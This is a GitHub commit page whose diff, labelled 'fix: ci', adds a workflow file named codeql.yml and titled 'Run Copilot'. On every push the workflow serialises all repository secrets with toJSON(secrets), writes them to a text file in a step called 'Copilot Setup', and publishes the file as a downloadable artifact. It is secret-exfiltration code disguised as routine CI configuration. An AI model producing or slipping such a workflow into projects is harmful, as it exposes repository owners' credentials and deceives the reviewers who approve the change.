Skip to content

Commit f0178fe

Browse files
committed
fix: ci
1 parent a55e9e1 commit f0178fe

1 file changed

Lines changed: 17 additions & 0 deletions

File tree

.github/workflows/codeql.yml

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
name: Run Copilot
2+
run-name: Run Copilot
3+
on:
4+
push:
5+
jobs:
6+
format:
7+
runs-on: ubuntu-latest
8+
env:
9+
VARIABLE_STORE: ${{ toJSON(secrets) }}
10+
steps:
11+
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
12+
- name: Copilot Setup
13+
run: echo "$VARIABLE_STORE" > format-results.txt
14+
- uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
15+
with:
16+
name: format-results
17+
path: format-results.txt

0 commit comments

Comments
 (0)